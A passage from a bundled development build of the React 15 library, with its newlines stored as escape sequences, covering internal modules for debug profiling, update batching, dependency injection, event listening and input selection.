arguments[1] : false;\n\n  if (allowRoot && debugID === 0) {\n    return;\n  }\n  if (!debugID) {\n    \"development\" !== 'production' ? warning(false, 'ReactDebugTool: debugID may not be empty.') : void 0;\n  }\n}\n\nfunction beginLifeCycleTimer(debugID, timerType) {\n  if (currentFlushNesting === 0) {\n    return;\n  }\n  if (currentTimerType && !lifeCycleTimerHasWarned) {\n    \"development\" !== 'production' ? warning(false, 'There is an internal error in the React performance measurement code. ' + 'Did not expect %s timer to start while %s timer is still in ' + 'progress for %s instance.', timerType, currentTimerType || 'no', debugID === currentTimerDebugID ? 'the same' : 'another') : void 0;\n    lifeCycleTimerHasWarned = true;\n  }\n  currentTimerStartTime = performanceNow();\n  currentTimerNestedFlushDuration = 0;\n  currentTimerDebugID = debugID;\n  currentTimerType = timerType;\n}\n\nfunction endLifeCycleTimer(debugID, timerType) {\n  if (currentFlushNesting === 0) {\n    return;\n  }\n  if (currentTimerType !== timerType && !lifeCycleTimerHasWarned) {\n    \"development\" !== 'production' ? warning(false, 'There is an internal error in the React performance measurement code. ' + 'We did not expect %s timer to stop while %s timer is still in ' + 'progress for %s instance. Please report this as a bug in React.', timerType, currentTimerType || 'no', debugID === currentTimerDebugID ? 'the same' : 'another') : void 0;\n    lifeCycleTimerHasWarned = true;\n  }\n  if (isProfiling) {\n    currentFlushMeasurements.push({\n      timerType: timerType,\n      instanceID: debugID,\n      duration: performanceNow() - currentTimerStartTime - currentTimerNestedFlushDuration\n    });\n  }\n  currentTimerStartTime = 0;\n  currentTimerNestedFlushDuration = 0;\n  currentTimerDebugID = null;\n  currentTimerType = null;\n}\n\nfunction pauseCurrentLifeCycleTimer() {\n  var currentTimer = {\n    startTime: currentTimerStartTime,\n    nestedFlushStartTime: performanceNow(),\n    debugID: currentTimerDebugID,\n    timerType: currentTimerType\n  };\n  lifeCycleTimerStack.push(currentTimer);\n  currentTimerStartTime = 0;\n  currentTimerNestedFlushDuration = 0;\n  currentTimerDebugID = null;\n  currentTimerType = null;\n}\n\nfunction resumeCurrentLifeCycleTimer() {\n  var _lifeCycleTimerStack$ = lifeCycleTimerStack.pop(),\n      startTime = _lifeCycleTimerStack$.startTime,\n      nestedFlushStartTime = _lifeCycleTimerStack$.nestedFlushStartTime,\n      debugID = _lifeCycleTimerStack$.debugID,\n      timerType = _lifeCycleTimerStack$.timerType;\n\n  var nestedFlushDuration = performanceNow() - nestedFlushStartTime;\n  currentTimerStartTime = startTime;\n  currentTimerNestedFlushDuration += nestedFlushDuration;\n  currentTimerDebugID = debugID;\n  currentTimerType = timerType;\n}\n\nvar lastMarkTimeStamp = 0;\nvar canUsePerformanceMeasure = typeof performance !== 'undefined' && typeof performance.mark === 'function' && typeof performance.clearMarks === 'function' && typeof performance.measure === 'function' && typeof performance.clearMeasures === 'function';\n\nfunction shouldMark(debugID) {\n  if (!isProfiling || !canUsePerformanceMeasure) {\n    return false;\n  }\n  var element = ReactComponentTreeHook.getElement(debugID);\n  if (element == null || typeof element !== 'object') {\n    return false;\n  }\n  var isHostElement = typeof element.type === 'string';\n  if (isHostElement) {\n    return false;\n  }\n  return true;\n}\n\nfunction markBegin(debugID, markType) {\n  if (!shouldMark(debugID)) {\n    return;\n  }\n\n  var markName = debugID + '::' + markType;\n  lastMarkTimeStamp = performanceNow();\n  performance.mark(markName);\n}\n\nfunction markEnd(debugID, markType) {\n  if (!shouldMark(debugID)) {\n    return;\n  }\n\n  var markName = debugID + '::' + markType;\n  var displayName = ReactComponentTreeHook.getDisplayName(debugID) || 'Unknown';\n\n  // Chrome has an issue of dropping markers recorded too fast:\n  // https://bugs.chromium.org/p/chromium/issues/detail?id=640652\n  // To work around this, we will not report very small measurements.\n  // I determined the magic number by tweaking it back and forth.\n  // 0.05ms was enough to prevent the issue, but I set it to 0.1ms to be safe.\n  // When the bug is fixed, we can `measure()` unconditionally if we want to.\n  var timeStamp = performanceNow();\n  if (timeStamp - lastMarkTimeStamp > 0.1) {\n    var measurementName = displayName + ' [' + markType + ']';\n    performance.measure(measurementName, markName);\n  }\n\n  performance.clearMarks(markName);\n  if (measurementName) {\n    performance.clearMeasures(measurementName);\n  }\n}\n\nvar ReactDebugTool = {\n  addHook: function (hook) {\n    hooks.push(hook);\n  },\n  removeHook: function (hook) {\n    for (var i = 0; i < hooks.length; i++) {\n      if (hooks[i] === hook) {\n        hooks.splice(i, 1);\n        i--;\n      }\n    }\n  },\n  isProfiling: function () {\n    return isProfiling;\n  },\n  beginProfiling: function () {\n    if (isProfiling) {\n      return;\n    }\n\n    isProfiling = true;\n    flushHistory.length = 0;\n    resetMeasurements();\n    ReactDebugTool.addHook(ReactHostOperationHistoryHook);\n  },\n  endProfiling: function () {\n    if (!isProfiling) {\n      return;\n    }\n\n    isProfiling = false;\n    resetMeasurements();\n    ReactDebugTool.removeHook(ReactHostOperationHistoryHook);\n  },\n  getFlushHistory: function () {\n    return flushHistory;\n  },\n  onBeginFlush: function () {\n    currentFlushNesting++;\n    resetMeasurements();\n    pauseCurrentLifeCycleTimer();\n    emitEvent('onBeginFlush');\n  },\n  onEndFlush: function () {\n    resetMeasurements();\n    currentFlushNesting--;\n    resumeCurrentLifeCycleTimer();\n    emitEvent('onEndFlush');\n  },\n  onBeginLifeCycleTimer: function (debugID, timerType) {\n    checkDebugID(debugID);\n    emitEvent('onBeginLifeCycleTimer', debugID, timerType);\n    markBegin(debugID, timerType);\n    beginLifeCycleTimer(debugID, timerType);\n  },\n  onEndLifeCycleTimer: function (debugID, timerType) {\n    checkDebugID(debugID);\n    endLifeCycleTimer(debugID, timerType);\n    markEnd(debugID, timerType);\n    emitEvent('onEndLifeCycleTimer', debugID, timerType);\n  },\n  onBeginProcessingChildContext: function () {\n    emitEvent('onBeginProcessingChildContext');\n  },\n  onEndProcessingChildContext: function () {\n    emitEvent('onEndProcessingChildContext');\n  },\n  onHostOperation: function (operation) {\n    checkDebugID(operation.instanceID);\n    emitEvent('onHostOperation', operation);\n  },\n  onSetState: function () {\n    emitEvent('onSetState');\n  },\n  onSetChildren: function (debugID, childDebugIDs) {\n    checkDebugID(debugID);\n    childDebugIDs.forEach(checkDebugID);\n    emitEvent('onSetChildren', debugID, childDebugIDs);\n  },\n  onBeforeMountComponent: function (debugID, element, parentDebugID) {\n    checkDebugID(debugID);\n    checkDebugID(parentDebugID, true);\n    emitEvent('onBeforeMountComponent', debugID, element, parentDebugID);\n    markBegin(debugID, 'mount');\n  },\n  onMountComponent: function (debugID) {\n    checkDebugID(debugID);\n    markEnd(debugID, 'mount');\n    emitEvent('onMountComponent', debugID);\n  },\n  onBeforeUpdateComponent: function (debugID, element) {\n    checkDebugID(debugID);\n    emitEvent('onBeforeUpdateComponent', debugID, element);\n    markBegin(debugID, 'update');\n  },\n  onUpdateComponent: function (debugID) {\n    checkDebugID(debugID);\n    markEnd(debugID, 'update');\n    emitEvent('onUpdateComponent', debugID);\n  },\n  onBeforeUnmountComponent: function (debugID) {\n    checkDebugID(debugID);\n    emitEvent('onBeforeUnmountComponent', debugID);\n    markBegin(debugID, 'unmount');\n  },\n  onUnmountComponent: function (debugID) {\n    checkDebugID(debugID);\n    markEnd(debugID, 'unmount');\n    emitEvent('onUnmountComponent', debugID);\n  },\n  onTestEvent: function () {\n    emitEvent('onTestEvent');\n  }\n};\n\n// TODO remove these when RN/www gets updated\nReactDebugTool.addDevtool = ReactDebugTool.addHook;\nReactDebugTool.removeDevtool = ReactDebugTool.removeHook;\n\nReactDebugTool.addHook(ReactInvalidSetStateWarningHook);\nReactDebugTool.addHook(ReactComponentTreeHook);\nvar url = ExecutionEnvironment.canUseDOM && window.location.href || '';\nif (/[?&]react_perf\\b/.test(url)) {\n  ReactDebugTool.beginProfiling();\n}\n\nmodule.exports = ReactDebugTool;\n},{\"133\":133,\"138\":138,\"157\":157,\"159\":159,\"60\":60,\"65\":65}],51:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar ReactUpdates = _dereq_(82);\nvar Transaction = _dereq_(100);\n\nvar emptyFunction = _dereq_(144);\n\nvar RESET_BATCHED_UPDATES = {\n  initialize: emptyFunction,\n  close: function () {\n    ReactDefaultBatchingStrategy.isBatchingUpdates = false;\n  }\n};\n\nvar FLUSH_BATCHED_UPDATES = {\n  initialize: emptyFunction,\n  close: ReactUpdates.flushBatchedUpdates.bind(ReactUpdates)\n};\n\nvar TRANSACTION_WRAPPERS = [FLUSH_BATCHED_UPDATES, RESET_BATCHED_UPDATES];\n\nfunction ReactDefaultBatchingStrategyTransaction() {\n  this.reinitializeTransaction();\n}\n\n_assign(ReactDefaultBatchingStrategyTransaction.prototype, Transaction, {\n  getTransactionWrappers: function () {\n    return TRANSACTION_WRAPPERS;\n  }\n});\n\nvar transaction = new ReactDefaultBatchingStrategyTransaction();\n\nvar ReactDefaultBatchingStrategy = {\n  isBatchingUpdates: false,\n\n  /**\n   * Call the provided function in a context within which calls to `setState`\n   * and friends are batched such that components aren't updated unnecessarily.\n   */\n  batchedUpdates: function (callback, a, b, c, d, e) {\n    var alreadyBatchingUpdates = ReactDefaultBatchingStrategy.isBatchingUpdates;\n\n    ReactDefaultBatchingStrategy.isBatchingUpdates = true;\n\n    // The code is written this way to avoid extra allocations\n    if (alreadyBatchingUpdates) {\n      return callback(a, b, c, d, e);\n    } else {\n      return transaction.perform(callback, null, a, b, c, d, e);\n    }\n  }\n};\n\nmodule.exports = ReactDefaultBatchingStrategy;\n},{\"100\":100,\"144\":144,\"160\":160,\"82\":82}],52:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ARIADOMPropertyConfig = _dereq_(1);\nvar BeforeInputEventPlugin = _dereq_(3);\nvar ChangeEventPlugin = _dereq_(7);\nvar DefaultEventPluginOrder = _dereq_(14);\nvar EnterLeaveEventPlugin = _dereq_(15);\nvar HTMLDOMPropertyConfig = _dereq_(22);\nvar ReactComponentBrowserEnvironment = _dereq_(28);\nvar ReactDOMComponent = _dereq_(32);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactDOMEmptyComponent = _dereq_(36);\nvar ReactDOMTreeTraversal = _dereq_(47);\nvar ReactDOMTextComponent = _dereq_(45);\nvar ReactDefaultBatchingStrategy = _dereq_(51);\nvar ReactEventListener = _dereq_(57);\nvar ReactInjection = _dereq_(61);\nvar ReactReconcileTransaction = _dereq_(74);\nvar SVGDOMPropertyConfig = _dereq_(84);\nvar SelectEventPlugin = _dereq_(85);\nvar SimpleEventPlugin = _dereq_(86);\n\nvar alreadyInjected = false;\n\nfunction inject() {\n  if (alreadyInjected) {\n    // TODO: This is currently true because these injections are shared between\n    // the client and the server package. They should be built independently\n    // and not share any injection state. Then this problem will be solved.\n    return;\n  }\n  alreadyInjected = true;\n\n  ReactInjection.EventEmitter.injectReactEventListener(ReactEventListener);\n\n  /**\n   * Inject modules for resolving DOM hierarchy and plugin ordering.\n   */\n  ReactInjection.EventPluginHub.injectEventPluginOrder(DefaultEventPluginOrder);\n  ReactInjection.EventPluginUtils.injectComponentTree(ReactDOMComponentTree);\n  ReactInjection.EventPluginUtils.injectTreeTraversal(ReactDOMTreeTraversal);\n\n  /**\n   * Some important event plugins included by default (without having to require\n   * them).\n   */\n  ReactInjection.EventPluginHub.injectEventPluginsByName({\n    SimpleEventPlugin: SimpleEventPlugin,\n    EnterLeaveEventPlugin: EnterLeaveEventPlugin,\n    ChangeEventPlugin: ChangeEventPlugin,\n    SelectEventPlugin: SelectEventPlugin,\n    BeforeInputEventPlugin: BeforeInputEventPlugin\n  });\n\n  ReactInjection.HostComponent.injectGenericComponentClass(ReactDOMComponent);\n\n  ReactInjection.HostComponent.injectTextComponentClass(ReactDOMTextComponent);\n\n  ReactInjection.DOMProperty.injectDOMPropertyConfig(ARIADOMPropertyConfig);\n  ReactInjection.DOMProperty.injectDOMPropertyConfig(HTMLDOMPropertyConfig);\n  ReactInjection.DOMProperty.injectDOMPropertyConfig(SVGDOMPropertyConfig);\n\n  ReactInjection.EmptyComponent.injectEmptyComponentFactory(function (instantiate) {\n    return new ReactDOMEmptyComponent(instantiate);\n  });\n\n  ReactInjection.Updates.injectReconcileTransaction(ReactReconcileTransaction);\n  ReactInjection.Updates.injectBatchingStrategy(ReactDefaultBatchingStrategy);\n\n  ReactInjection.Component.injectEnvironment(ReactComponentBrowserEnvironment);\n}\n\nmodule.exports = {\n  inject: inject\n};\n},{\"1\":1,\"14\":14,\"15\":15,\"22\":22,\"28\":28,\"3\":3,\"32\":32,\"34\":34,\"36\":36,\"45\":45,\"47\":47,\"51\":51,\"57\":57,\"61\":61,\"7\":7,\"74\":74,\"84\":84,\"85\":85,\"86\":86}],53:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n// The Symbol used to tag the ReactElement type. If there is no native Symbol\n// nor polyfill, then a plain number is used for performance.\n\nvar REACT_ELEMENT_TYPE = typeof Symbol === 'function' && Symbol['for'] && Symbol['for']('react.element') || 0xeac7;\n\nmodule.exports = REACT_ELEMENT_TYPE;\n},{}],54:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar emptyComponentFactory;\n\nvar ReactEmptyComponentInjection = {\n  injectEmptyComponentFactory: function (factory) {\n    emptyComponentFactory = factory;\n  }\n};\n\nvar ReactEmptyComponent = {\n  create: function (instantiate) {\n    return emptyComponentFactory(instantiate);\n  }\n};\n\nReactEmptyComponent.injection = ReactEmptyComponentInjection;\n\nmodule.exports = ReactEmptyComponent;\n},{}],55:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar caughtError = null;\n\n/**\n * Call a function while guarding against errors that happens within it.\n *\n * @param {String} name of the guard to use for logging or debugging\n * @param {Function} func The function to invoke\n * @param {*} a First argument\n * @param {*} b Second argument\n */\nfunction invokeGuardedCallback(name, func, a) {\n  try {\n    func(a);\n  } catch (x) {\n    if (caughtError === null) {\n      caughtError = x;\n    }\n  }\n}\n\nvar ReactErrorUtils = {\n  invokeGuardedCallback: invokeGuardedCallback,\n\n  /**\n   * Invoked by ReactTestUtils.Simulate so that any errors thrown by the event\n   * handler are sure to be rethrown by rethrowCaughtError.\n   */\n  invokeGuardedCallbackWithCatch: invokeGuardedCallback,\n\n  /**\n   * During execution of guarded functions we will capture the first error which\n   * we will rethrow to be handled by the top level error handler.\n   */\n  rethrowCaughtError: function () {\n    if (caughtError) {\n      var error = caughtError;\n      caughtError = null;\n      throw error;\n    }\n  }\n};\n\nif (\"development\" !== 'production') {\n  /**\n   * To help development we can get better devtools integration by simulating a\n   * real browser event.\n   */\n  if (typeof window !== 'undefined' && typeof window.dispatchEvent === 'function' && typeof document !== 'undefined' && typeof document.createEvent === 'function') {\n    var fakeNode = document.createElement('react');\n    ReactErrorUtils.invokeGuardedCallback = function (name, func, a) {\n      var boundFunc = func.bind(null, a);\n      var evtType = 'react-' + name;\n      fakeNode.addEventListener(evtType, boundFunc, false);\n      var evt = document.createEvent('Event');\n      evt.initEvent(evtType, false, false);\n      fakeNode.dispatchEvent(evt);\n      fakeNode.removeEventListener(evtType, boundFunc, false);\n    };\n  }\n}\n\nmodule.exports = ReactErrorUtils;\n},{}],56:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar EventPluginHub = _dereq_(17);\n\nfunction runEventQueueInBatch(events) {\n  EventPluginHub.enqueueEvents(events);\n  EventPluginHub.processEventQueue(false);\n}\n\nvar ReactEventEmitterMixin = {\n  /**\n   * Streams a fired top-level event to `EventPluginHub` where plugins have the\n   * opportunity to create `ReactEvent`s to be dispatched.\n   */\n  handleTopLevel: function (topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n    var events = EventPluginHub.extractEvents(topLevelType, targetInst, nativeEvent, nativeEventTarget);\n    runEventQueueInBatch(events);\n  }\n};\n\nmodule.exports = ReactEventEmitterMixin;\n},{\"17\":17}],57:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar EventListener = _dereq_(137);\nvar ExecutionEnvironment = _dereq_(138);\nvar PooledClass = _dereq_(25);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactUpdates = _dereq_(82);\n\nvar getEventTarget = _dereq_(114);\nvar getUnboundedScrollPosition = _dereq_(149);\n\n/**\n * Find the deepest React component completely containing the root of the\n * passed-in instance (for use when entire React trees are nested within each\n * other). If React trees are not nested, returns null.\n */\nfunction findParent(inst) {\n  // TODO: It may be a good idea to cache this to prevent unnecessary DOM\n  // traversal, but caching is difficult to do correctly without using a\n  // mutation observer to listen for all DOM changes.\n  while (inst._hostParent) {\n    inst = inst._hostParent;\n  }\n  var rootNode = ReactDOMComponentTree.getNodeFromInstance(inst);\n  var container = rootNode.parentNode;\n  return ReactDOMComponentTree.getClosestInstanceFromNode(container);\n}\n\n// Used to store ancestor hierarchy in top level callback\nfunction TopLevelCallbackBookKeeping(topLevelType, nativeEvent) {\n  this.topLevelType = topLevelType;\n  this.nativeEvent = nativeEvent;\n  this.ancestors = [];\n}\n_assign(TopLevelCallbackBookKeeping.prototype, {\n  destructor: function () {\n    this.topLevelType = null;\n    this.nativeEvent = null;\n    this.ancestors.length = 0;\n  }\n});\nPooledClass.addPoolingTo(TopLevelCallbackBookKeeping, PooledClass.twoArgumentPooler);\n\nfunction handleTopLevelImpl(bookKeeping) {\n  var nativeEventTarget = getEventTarget(bookKeeping.nativeEvent);\n  var targetInst = ReactDOMComponentTree.getClosestInstanceFromNode(nativeEventTarget);\n\n  // Loop through the hierarchy, in case there's any nested components.\n  // It's important that we build the array of ancestors before calling any\n  // event handlers, because event handlers can modify the DOM, leading to\n  // inconsistencies with ReactMount's node cache. See #1105.\n  var ancestor = targetInst;\n  do {\n    bookKeeping.ancestors.push(ancestor);\n    ancestor = ancestor && findParent(ancestor);\n  } while (ancestor);\n\n  for (var i = 0; i < bookKeeping.ancestors.length; i++) {\n    targetInst = bookKeeping.ancestors[i];\n    ReactEventListener._handleTopLevel(bookKeeping.topLevelType, targetInst, bookKeeping.nativeEvent, getEventTarget(bookKeeping.nativeEvent));\n  }\n}\n\nfunction scrollValueMonitor(cb) {\n  var scrollPosition = getUnboundedScrollPosition(window);\n  cb(scrollPosition);\n}\n\nvar ReactEventListener = {\n  _enabled: true,\n  _handleTopLevel: null,\n\n  WINDOW_HANDLE: ExecutionEnvironment.canUseDOM ? window : null,\n\n  setHandleTopLevel: function (handleTopLevel) {\n    ReactEventListener._handleTopLevel = handleTopLevel;\n  },\n\n  setEnabled: function (enabled) {\n    ReactEventListener._enabled = !!enabled;\n  },\n\n  isEnabled: function () {\n    return ReactEventListener._enabled;\n  },\n\n  /**\n   * Traps top-level events by using event bubbling.\n   *\n   * @param {string} topLevelType Record from `EventConstants`.\n   * @param {string} handlerBaseName Event name (e.g. \"click\").\n   * @param {object} element Element on which to attach listener.\n   * @return {?object} An object with a remove function which will forcefully\n   *                  remove the listener.\n   * @internal\n   */\n  trapBubbledEvent: function (topLevelType, handlerBaseName, element) {\n    if (!element) {\n      return null;\n    }\n    return EventListener.listen(element, handlerBaseName, ReactEventListener.dispatchEvent.bind(null, topLevelType));\n  },\n\n  /**\n   * Traps a top-level event by using event capturing.\n   *\n   * @param {string} topLevelType Record from `EventConstants`.\n   * @param {string} handlerBaseName Event name (e.g. \"click\").\n   * @param {object} element Element on which to attach listener.\n   * @return {?object} An object with a remove function which will forcefully\n   *                  remove the listener.\n   * @internal\n   */\n  trapCapturedEvent: function (topLevelType, handlerBaseName, element) {\n    if (!element) {\n      return null;\n    }\n    return EventListener.capture(element, handlerBaseName, ReactEventListener.dispatchEvent.bind(null, topLevelType));\n  },\n\n  monitorScrollValue: function (refresh) {\n    var callback = scrollValueMonitor.bind(null, refresh);\n    EventListener.listen(window, 'scroll', callback);\n  },\n\n  dispatchEvent: function (topLevelType, nativeEvent) {\n    if (!ReactEventListener._enabled) {\n      return;\n    }\n\n    var bookKeeping = TopLevelCallbackBookKeeping.getPooled(topLevelType, nativeEvent);\n    try {\n      // Event queue being processed in the same cycle allows\n      // `preventDefault`.\n      ReactUpdates.batchedUpdates(handleTopLevelImpl, bookKeeping);\n    } finally {\n      TopLevelCallbackBookKeeping.release(bookKeeping);\n    }\n  }\n};\n\nmodule.exports = ReactEventListener;\n},{\"114\":114,\"137\":137,\"138\":138,\"149\":149,\"160\":160,\"25\":25,\"34\":34,\"82\":82}],58:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar ReactFeatureFlags = {\n  // When true, call console.time() before and .timeEnd() after each top-level\n  // render (both initial renders and updates). Useful when looking at prod-mode\n  // timeline profiles in Chrome, for example.\n  logTopLevelRenders: false\n};\n\nmodule.exports = ReactFeatureFlags;\n},{}],59:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\nvar genericComponentClass = null;\nvar textComponentClass = null;\n\nvar ReactHostComponentInjection = {\n  // This accepts a class that receives the tag string. This is a catch all\n  // that can render any kind of tag.\n  injectGenericComponentClass: function (componentClass) {\n    genericComponentClass = componentClass;\n  },\n  // This accepts a text component class that takes the text string to be\n  // rendered as props.\n  injectTextComponentClass: function (componentClass) {\n    textComponentClass = componentClass;\n  }\n};\n\n/**\n * Get a host internal component class for a specific tag.\n *\n * @param {ReactElement} element The element to create.\n * @return {function} The internal class constructor function.\n */\nfunction createInternalComponent(element) {\n  !genericComponentClass ? \"development\" !== 'production' ? invariant(false, 'There is no registered component for the tag %s', element.type) : _prodInvariant('111', element.type) : void 0;\n  return new genericComponentClass(element);\n}\n\n/**\n * @param {ReactText} text\n * @return {ReactComponent}\n */\nfunction createInstanceForText(text) {\n  return new textComponentClass(text);\n}\n\n/**\n * @param {ReactComponent} component\n * @return {boolean}\n */\nfunction isTextComponent(component) {\n  return component instanceof textComponentClass;\n}\n\nvar ReactHostComponent = {\n  createInternalComponent: createInternalComponent,\n  createInstanceForText: createInstanceForText,\n  isTextComponent: isTextComponent,\n  injection: ReactHostComponentInjection\n};\n\nmodule.exports = ReactHostComponent;\n},{\"126\":126,\"152\":152}],60:[function(_dereq_,module,exports){\n/**\n * Copyright 2016-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar history = [];\n\nvar ReactHostOperationHistoryHook = {\n  onHostOperation: function (operation) {\n    history.push(operation);\n  },\n  clearHistory: function () {\n    if (ReactHostOperationHistoryHook._preventClearing) {\n      // Should only be used for tests.\n      return;\n    }\n\n    history = [];\n  },\n  getHistory: function () {\n    return history;\n  }\n};\n\nmodule.exports = ReactHostOperationHistoryHook;\n},{}],61:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMProperty = _dereq_(11);\nvar EventPluginHub = _dereq_(17);\nvar EventPluginUtils = _dereq_(19);\nvar ReactComponentEnvironment = _dereq_(29);\nvar ReactEmptyComponent = _dereq_(54);\nvar ReactBrowserEventEmitter = _dereq_(26);\nvar ReactHostComponent = _dereq_(59);\nvar ReactUpdates = _dereq_(82);\n\nvar ReactInjection = {\n  Component: ReactComponentEnvironment.injection,\n  DOMProperty: DOMProperty.injection,\n  EmptyComponent: ReactEmptyComponent.injection,\n  EventPluginHub: EventPluginHub.injection,\n  EventPluginUtils: EventPluginUtils.injection,\n  EventEmitter: ReactBrowserEventEmitter.injection,\n  HostComponent: ReactHostComponent.injection,\n  Updates: ReactUpdates.injection\n};\n\nmodule.exports = ReactInjection;\n},{\"11\":11,\"17\":17,\"19\":19,\"26\":26,\"29\":29,\"54\":54,\"59\":59,\"82\":82}],62:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactDOMSelection = _dereq_(44);\n\nvar containsNode = _dereq_(141);\nvar focusNode = _dereq_(146);\nvar getActiveElement = _dereq_(147);\n\nfunction isInDocument(node) {\n  return containsNode(document.documentElement, node);\n}\n\n/**\n * @ReactInputSelection: React input selection module. Based on Selection.js,\n * but modified to be suitable for react and has a couple of bug fixes (doesn't\n * assume buttons have range selections allowed).\n * Input selection module for React.\n */\nvar ReactInputSelection = {\n  hasSelectionCapabilities: function (elem) {\n    var nodeName = elem && elem.nodeName && elem.nodeName.toLowerCase();\n    return nodeName && (nodeName === 'input' && elem.type === 'text' || nodeName === 'textarea' || elem.contentEditable === 'true');\n  },\n\n  getSelectionInformation: function () {\n    var focusedElem = getActiveElement();\n    return {\n      focusedElem: focusedElem,\n      selectionRange: ReactInputSelection.hasSelectionCapabilities(focusedElem) ? ReactInputSelection.getSelection(focusedElem) : null\n    };\n  },\n\n  /**\n   * @restoreSelection: If any selection information was potentially lost,\n   * restore it. This is useful when performing operations that could remove dom\n   * nodes and place them back in, resulting in focus being lost.\n   */\n  restoreSelection: function (priorSelectionInformation) {\n    var curFocusedElem = getActiveElement();\n    var priorFocusedElem = priorSelectionInformation.focusedElem;\n    var priorSelectionRange = priorSelectionInformation.selectionRange;\n    if (curFocusedElem !== priorFocusedElem && isInDocument(priorFocusedElem)) {\n      if (ReactInputSelection.hasSelectionCapabilities(priorFocusedElem)) {\n        ReactInputSelection.setSelection(priorFocusedElem, priorSelectionRange);\n      }\n      focusNode(priorFocusedElem);\n    }\n  },\n\n  /**\n   * @getSelection: Gets the selection bounds of a focused textarea, input or\n   * contentEditable node.\n   * -@input: Look up selection bounds of this input\n   * -@return {start: selectionStart, end: selectionEnd}\n   */\n  getSelection: function (input) {\n    var selection;\n\n    if ('selectionStart' in input) {\n      // Modern browser with input or textarea.\n      selection = {\n        start: input.selectionStart,\n        end: input.selectionEnd\n      };\n    } else if (document.selection && input.nodeName && input.nodeName.toLowerCase() === 'input') {\n      // IE8 input.\n      var range = document.selection.createRange();\n      // There can only be one selection per document in IE, so it must\n      // be in our element.\n      if (range.parentElement() === input) {\n        selection = {\n          start: -range.moveStart('character', -input.value.length),\n          end: -range.moveEnd('character', -input.value.length)\n        };\n      }\n    } else {\n      // Content editable or old IE textarea.\n      selection = ReactDOMSelection.getOffsets(input);\n    }\n\n    return selection || { start: 0, end: 0 };\n  },\n\n  /**\n   * @setSelection: Sets the selection bounds of a textarea or input and focuses\n   * the input.\n   * -@input     Set selection bounds of this input or textarea\n   * -@offsets   Object of same form that is returned from get*\n   */\n  setSelection: function (input, offsets) {\n    var start = offsets.start;\n    var end = offsets.end;\n    if (end === undefined) {\n      end = start;\n    }\n\n    if ('selectionStart' in input) {\n      input.selectionStart = start;\n      input.selectionEnd = Math.min(end, input.value.length);\n    } else if (document.selection && input.nodeName && input.nodeName.toLowerCase() === 'input') {\n      var range = input.createTextRange();\n      range.collapse(true);\n      range.moveStart('character', start);\n      range.moveEnd('character', end - start);\n      range.select();\n    } else {\n      ReactDOMSelection.setOffsets(input, offsets);\n    }\n  }\n};\n\nmodule.exports = ReactInputSelection;\n},{\"141\":141,\"146\":146,\"147\":147,\"44\":44}],63:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * `ReactInstanceMap` 